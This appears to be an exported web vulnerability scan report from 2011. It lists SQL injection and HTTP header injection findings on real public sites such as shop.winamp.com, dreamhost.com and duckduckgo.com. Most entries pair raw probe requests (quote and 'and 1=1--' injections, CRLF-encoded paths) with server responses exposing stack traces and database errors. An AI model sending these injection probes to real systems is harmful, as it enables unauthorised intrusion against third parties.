| GET /store?Action=Displa Host: shop.winamp.com Proxy-Connection: keep-alive Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UNAUTHID=1.f2ed797a4 |
| HTTP/1.1 200 OK Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Cache-Control: max-age=0 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10 Date: Sun, 27 Feb 2011 17:45:50 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb02@dc1app59 Content-Length: 23801 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <head> <!--!esi:include src="/esi?Sit ...[SNIP]... /store?Action=Displa ...[SNIP]... <pre>com.digitalriver.exception.TrackedSystemException: SIT_000001 at com.digitalriver.system at com.digitalriver.system ...[SNIP]... |
| GET /store?Action=Displa Host: shop.winamp.com Proxy-Connection: keep-alive Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UNAUTHID=1.f2ed797a4 |
| HTTP/1.1 302 Moved Temporarily Location: https://shop.winamp.com Content-Type: text/plain Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10 Content-Length: 0 Date: Sun, 27 Feb 2011 17:45:51 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb02@dc1app59 |
| Severity: | High |
| Confidence: | Tentative |
| Host: | http://shop.winamp.com |
| Path: | /store |
| GET /store?Action=Displa Host: shop.winamp.com Proxy-Connection: keep-alive Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UNAUTHID=1.f2ed797a4 |
| HTTP/1.1 200 OK Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Cache-Control: max-age=0 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10 Date: Sun, 27 Feb 2011 17:47:41 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb02@dc1app59 Content-Length: 41391 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <head> <!--!esi:include src="/esi?Sit ...[SNIP]... :include src="/store?1'=1&Action ...[SNIP]... <pre>com.digitalriver.exception.TrackedSystemException: SIT_000002 at com.digitalriver.system at com.digitalriver.system ...[SNIP]... .tomcat.util.threads at java.lang.Thread.run Caused by: com.digitalriver.rules Failed expression:product at com.digitalriver.rules at com.digitalriver.rules ...[SNIP]... |
| GET /store?Action=Displa Host: shop.winamp.com Proxy-Connection: keep-alive Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UNAUTHID=1.f2ed797a4 |
| HTTP/1.1 302 Moved Temporarily Location: https://shop.winamp.com Content-Type: text/plain Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10 Content-Length: 0 Date: Sun, 27 Feb 2011 17:47:41 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb02@dc1app59 |
| Severity: | High |
| Confidence: | Tentative |
| Host: | http://shop.winamp.com |
| Path: | /store |
| GET /store?Action=Displa Host: shop.winamp.com Proxy-Connection: keep-alive Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UNAUTHID=1.f2ed797a4 |
| HTTP/1.1 200 OK Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Cache-Control: max-age=0 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10 Date: Sun, 27 Feb 2011 17:46:06 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb02@dc1app59 Content-Length: 25208 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <head> <!--!esi:include src="/esi?Sit ...[SNIP]... -!esi:include src="/store?Action ...[SNIP]... <pre>java.lang.NullP at com.digitalriver.security at sun.reflect.Generate at sun.reflect.Delegati ...[SNIP]... |
| GET /store?Action=Displa Host: shop.winamp.com Proxy-Connection: keep-alive Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UNAUTHID=1.f2ed797a4 |
| HTTP/1.1 302 Moved Temporarily Location: https://shop.winamp.com Content-Type: text/plain Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10 Content-Length: 0 Date: Sun, 27 Feb 2011 17:46:06 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb02@dc1app59 |
| Severity: | High |
| Confidence: | Tentative |
| Host: | http://shop.winamp.com |
| Path: | /store |
| GET /store?Action=Displa Host: shop.winamp.com Proxy-Connection: keep-alive Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UNAUTHID=1.f2ed797a4 |
| HTTP/1.1 200 OK Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Cache-Control: max-age=0 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10 Date: Sun, 27 Feb 2011 17:47:32 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb02@dc1app59 Content-Length: 24205 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <head> <!--!esi:include src="/esi?Sit ...[SNIP]... -!esi:include src="/store?Action ...[SNIP]... <pre>javax.servlet at com.digitalriver.system at com.digitalriver.system ...[SNIP]... |
| GET /store?Action=Displa Host: shop.winamp.com Proxy-Connection: keep-alive Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UNAUTHID=1.f2ed797a4 |
| HTTP/1.1 302 Moved Temporarily Location: https://shop.winamp.com Content-Type: text/plain Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10 Content-Length: 0 Date: Sun, 27 Feb 2011 17:47:33 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb02@dc1app59 |
| Severity: | High |
| Confidence: | Tentative |
| Host: | http://shop.winamp.com |
| Path: | /store |
| GET /store?Action=Displa Host: shop.winamp.com Proxy-Connection: keep-alive Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UNAUTHID=1.f2ed797a4 |
| HTTP/1.1 200 OK Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Cache-Control: max-age=0 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10 Date: Sun, 27 Feb 2011 17:47:36 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb02@dc1app59 Content-Length: 24205 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <head> <!--!esi:include src="/esi?Sit ...[SNIP]... -!esi:include src="/store?Action ...[SNIP]... <pre>javax.servlet at com.digitalriver.system at com.digitalriver.system ...[SNIP]... |
| GET /store?Action=Displa Host: shop.winamp.com Proxy-Connection: keep-alive Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UNAUTHID=1.f2ed797a4 |
| HTTP/1.1 302 Moved Temporarily Location: https://shop.winamp.com Content-Type: text/plain Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10 Content-Length: 0 Date: Sun, 27 Feb 2011 17:47:36 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb02@dc1app59 |
| Severity: | High |
| Confidence: | Tentative |
| Host: | https://shop.winamp.com |
| Path: | /store |
| GET /store?Action=DisplayPage Host: shop.winamp.com Connection: keep-alive Referer: http://forums.winamp.com Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UNAUTHID=1.f2ed797a4 |
| HTTP/1.1 200 OK Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Cache-Control: max-age=0 Connection: Keep-Alive Keep-Alive: timeout=45, max=999 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10 Date: Sun, 27 Feb 2011 17:47:40 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb02@dc1app59 Content-Length: 82107 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <head> <!--!esi:include src="/esi?Sit ...[SNIP]... <pre>java.lang.RuntimeException: java.lang.RuntimeExc at com.digitalriver.site at com.digitalriver.taglib ...[SNIP]... |
| GET /store?Action=DisplayPage Host: shop.winamp.com Connection: keep-alive Referer: http://forums.winamp.com Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UNAUTHID=1.f2ed797a4 |
| HTTP/1.1 302 Moved Temporarily Pragma: no-cache Cache-Control: no-cache, no-store, must-revalidate, max-age=0, private Expires: Wed, 31 Dec 1969 23:59:59 GMT Location: http://shop.winamp.com:80 Content-Type: text/plain Connection: Keep-Alive Keep-Alive: timeout=45, max=999 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10 Content-Length: 0 Date: Sun, 27 Feb 2011 17:47:40 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb02@dc1app59 |
| Severity: | High |
| Confidence: | Tentative |
| Host: | http://static.ak.fbcdn |
| Path: | /rsrc.php/v1/yF/r |
| GET /rsrc.php/v1/yF/r'%20and%201%3d1--%20/QsQtRaU6mGT.css HTTP/1.1 Host: static.ak.fbcdn.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 404 Not Found Content-Length: 7 Content-Type: text/html; charset=utf-8 X-Bad-Checksum: yF X-Powered-By: HPHP X-FB-Server: 10.138.64.184 Vary: Accept-Encoding Cache-Control: public, max-age=86400 Expires: Sun, 27 Feb 2011 23:10:57 GMT Date: Sat, 26 Feb 2011 23:10:57 GMT Connection: close /*bcs*/ |
| GET /rsrc.php/v1/yF/r'%20and%201%3d2--%20/QsQtRaU6mGT.css HTTP/1.1 Host: static.ak.fbcdn.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 403 Forbidden X-Bad-Prefix: /v1/yF/r' and 1=2-- /QsQtRaU6mGT.css Content-Type: text/html; charset=utf-8 X-Powered-By: HPHP X-FB-Server: 10.138.17.183 Content-Length: 0 Vary: Accept-Encoding Expires: Sat, 26 Feb 2011 23:10:57 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 26 Feb 2011 23:10:57 GMT Connection: close |
| Severity: | High |
| Confidence: | Tentative |
| Host: | http://www.capgemini.com |
| Path: | /insights-and-resources/ |
| GET /insights-and-resources/ Host: www.capgemini.com Proxy-Connection: keep-alive Referer: http://www.capgemini.com Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_cc=true; __llat=aHR0cDovL3d3d |
| HTTP/1.1 504 Gateway Time-out Server: nginx/0.6.35 Date: Mon, 28 Feb 2011 17:53:08 GMT Content-Type: text/html; charset=utf-8 Content-Length: 383 Connection: keep-alive <html> <head> <title>The page is temporarily unavailable</title> <style> body { font-family: Tahoma, Verdana, Arial, sans-serif; } </style> </head> <body bgcolor="white" text="black"> <table width="10 ...[SNIP]... |
| GET /insights-and-resources/ Host: www.capgemini.com Proxy-Connection: keep-alive Referer: http://www.capgemini.com Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_cc=true; __llat=aHR0cDovL3d3d |
| HTTP/1.1 200 OK Server: nginx/0.6.35 Date: Mon, 28 Feb 2011 17:53:39 GMT Content-Type: text/html; charset=utf-8 Connection: keep-alive X-Powered-By: PHP/5.2.8 Set-Cookie: PHPSESSID=57d2060e2e Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 32547 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <!--[if IE 6]> <html class="msie6" xmlns="http://www.w3.org ...[SNIP]... |
| Severity: | High |
| Confidence: | Tentative |
| Host: | http://www.companypond |
| Path: | / |
| GET /?1%00'=1 HTTP/1.1 Host: www.companypond.com Proxy-Connection: keep-alive Referer: http://adam.companypond Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.1 200 OK Date: Sun, 27 Feb 2011 16:52:16 GMT Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0 X-Powered-By: PHP/5.2.6-1+lenny9 Set-Cookie: symfony=fa03e4bec9c6 X-Ua-Compatible: IE=EmulateIE7 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 73454 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta htt ...[SNIP]... Marketing Company based in Morristown, NJ with offices in Miami, FL. Our primary focus is helping small to medium sized businesses achieve online marketing success. Our clients come to Optimum7 after failing to achieve their marketing objectives online and... <a href="/optimum7" title="Profile for optimum7"> ...[SNIP]... |
| GET /?1%00''=1 HTTP/1.1 Host: www.companypond.com Proxy-Connection: keep-alive Referer: http://adam.companypond Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.1 200 OK Date: Sun, 27 Feb 2011 16:52:18 GMT Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0 X-Powered-By: PHP/5.2.6-1+lenny9 Set-Cookie: symfony=fdc0940037a6 X-Ua-Compatible: IE=EmulateIE7 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 66519 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta htt ...[SNIP]... |
| Severity: | High |
| Confidence: | Tentative |
| Host: | http://www.dreamhost.com |
| Path: | /r.cgi |
| GET /r.cgi?129733' HTTP/1.1 Host: www.dreamhost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 502 Bad Gateway Server: nginx/0.8.53 Date: Sat, 26 Feb 2011 23:19:38 GMT Content-Type: text/html Connection: close Content-Length: 575 <html> <head><title>502 Bad Gateway</title></head> <body bgcolor="white"> <center><h1>502 Bad Gateway</h1></center> <hr><center>nginx/0.8.53< </body> </html> <!-- a padding to disable MSIE and Chrome friendly error page --> ...[SNIP]... |
| GET /r.cgi?129733'' HTTP/1.1 Host: www.dreamhost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 302 Found Server: nginx/0.8.53 Date: Sat, 26 Feb 2011 23:19:39 GMT Content-Type: text/plain Connection: close Set-Cookie: referrer=; domain=.dreamhost.com; path=/; expires=Sun, 27-Feb-2011 23:13:20 GMT Set-Cookie: referred=rewards%7C129733 Set-Cookie: redir=12722601; domain=.dreamhost.com; path=/; expires=Sun, 27-Feb-2011 23:13:21 GMT Location: http://www.dreamhost.com/ Content-Length: 0 |
| Severity: | High |
| Confidence: | Tentative |
| Host: | http://www.dreamhost.com |
| Path: | /r.cgi |
| GET /r.cgi?1'=1 HTTP/1.1 Host: www.dreamhost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 502 Bad Gateway Server: nginx/0.8.53 Date: Sat, 26 Feb 2011 23:19:36 GMT Content-Type: text/html Connection: close Content-Length: 575 <html> <head><title>502 Bad Gateway</title></head> <body bgcolor="white"> <center><h1>502 Bad Gateway</h1></center> <hr><center>nginx/0.8.53< </body> </html> <!-- a padding to disable MSIE and Chrome friendly error page --> ...[SNIP]... |
| GET /r.cgi?1''=1 HTTP/1.1 Host: www.dreamhost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 302 Found Server: nginx/0.8.53 Date: Sat, 26 Feb 2011 23:19:37 GMT Content-Type: text/plain Connection: close Set-Cookie: referrer=; domain=.dreamhost.com; path=/; expires=Sun, 27-Feb-2011 23:13:19 GMT Set-Cookie: referred=rewards%7C1%27 Set-Cookie: redir=12722600; domain=.dreamhost.com; path=/; expires=Sun, 27-Feb-2011 23:13:19 GMT Location: http://www.dreamhost.com/ Content-Length: 0 |
| Severity: | High |
| Confidence: | Firm |
| Host: | http://www.sti-cs.com |
| Path: | /Portfolio/Trades-and |
| GET /Portfolio/Trades-and Host: www.sti-cs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=249072581 |
| HTTP/1.1 200 OK Date: Sat, 26 Feb 2011 23:18:56 GMT Server: Apache/2.2.14 (Unix) FrontPage/5.0.2.2635 X-Powered-By: PHP/5.2.13 Connection: close Content-Type: text/html Content-Length: 14497 ... <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Trades and Exhibits :: STI - Creative Services</title> <script type="text/javascript" language="javascript ...[SNIP]... </b>: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in <b> ...[SNIP]... |
| Severity: | High |
| Confidence: | Firm |
| Host: | http://www.sti-cs.com |
| Path: | /Portfolio/Trades-and |
| GET /Portfolio/Trades-and Host: www.sti-cs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=249072581 |
| HTTP/1.1 200 OK Date: Sat, 26 Feb 2011 23:19:03 GMT Server: Apache/2.2.14 (Unix) FrontPage/5.0.2.2635 X-Powered-By: PHP/5.2.13 Connection: close Content-Type: text/html Content-Length: 14497 ... <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Trades and Exhibits :: STI - Creative Services</title> <script type="text/javascript" language="javascript ...[SNIP]... </b>: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in <b> ...[SNIP]... |
| Severity: | High |
| Confidence: | Firm |
| Host: | http://www.sti-cs.com |
| Path: | /Portfolio/Trades-and |
| GET /Portfolio/Trades-and Host: www.sti-cs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=249072581 |
| HTTP/1.1 200 OK Date: Sat, 26 Feb 2011 23:18:51 GMT Server: Apache/2.2.14 (Unix) FrontPage/5.0.2.2635 X-Powered-By: PHP/5.2.13 Connection: close Content-Type: text/html Content-Length: 14496 ... <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Trades and Exhibits :: STI - Creative Services</title> <script type="text/javascript" language="javascript ...[SNIP]... </b>: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in <b> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://ad.doubleclick.net |
| Path: | /adi/N2524.134426 |
| GET /38f9f%0d%0a80c0ca18afd/N2524.134426.071043 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=c708f553300004b|578176 |
| HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/38f9f 80c0ca18afd/N2524.134426.071043 Date: Mon, 28 Feb 2011 16:16:15 GMT Server: GFE/2.0 <h1>Error 302 Moved Temporarily</h1> |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://ad.doubleclick.net |
| Path: | /adj/N2998.159462 |
| GET /2de58%0d%0a6d24920450/N2998.159462.772439 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.winamp.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=c708f553300004b|578176 |
| HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/2de58 6d24920450/N2998.159462.772439 Date: Sun, 27 Feb 2011 17:46:27 GMT Server: GFE/2.0 <h1>Error 302 Moved Temporarily</h1> |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://ad.doubleclick.net |
| Path: | /adj/N2998.159462 |
| GET /62182%0d%0a5ce3b6d291b/N2998.159462.772439 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.winamp.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=c708f553300004b|578176 |
| HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/62182 5ce3b6d291b/N2998.159462.772439 Date: Sun, 27 Feb 2011 17:46:04 GMT Server: GFE/2.0 <h1>Error 302 Moved Temporarily</h1> |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://bs.serving-sys.com |
| Path: | /BurstingPipe/adServer.bs |
| GET /BurstingPipe/adServer.bs Host: bs.serving-sys.com Proxy-Connection: keep-alive Referer: http://techcrunch.com/wp Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: C4=; eyeblaster=BWVal=&BWDate= |
| HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html Expires: Sun, 05-Jun-2005 22:00:00 GMT Vary: Accept-Encoding Set-Cookie: eyeblaster=BWVal=&BWDate= eafac43fb55; expires=Fri, 27-May-2011 21: 31:25 GMT; domain=bs.serving-sys.com Set-Cookie: A3=heSmakII0c9M00001 Set-Cookie: B3=8r8g0000000001tf7 Set-Cookie: u2=3a6c8499-0c84-46b7 P3P: CP="NOI DEVa OUR BUS UNI" Date: Sun, 27 Feb 2011 02:31:24 GMT Connection: close Content-Length: 2193 var ebPtcl="http://";var ebBigS="ds.serving-sys ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | https://duckduckgo.com |
| Path: | /html/ |
| GET /html/?q=f0851%0d%0acb305ffa446 HTTP/1.1 Host: duckduckgo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: r=b; _qwerly_session |
| HTTP/1.1 200 OK Server: nginx Date: Tue, 01 Mar 2011 02:56:40 GMT Content-Type: text/html; charset=UTF-8 Connection: close Q: f0851 cb305ffa446Status: 200 OK Expires: Tue, 01 Mar 2011 02:56:41 GMT Cache-Control: max-age=1 Content-Length: 7794 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <!-- link href="http ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | https://login.oracle.com |
| Path: | /pls/orasso/orasso.wwsso |
| GET /pls/orasso/orasso.wwsso Host: login.oracle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ORASSO_AUTH_HINT=v1.0 |
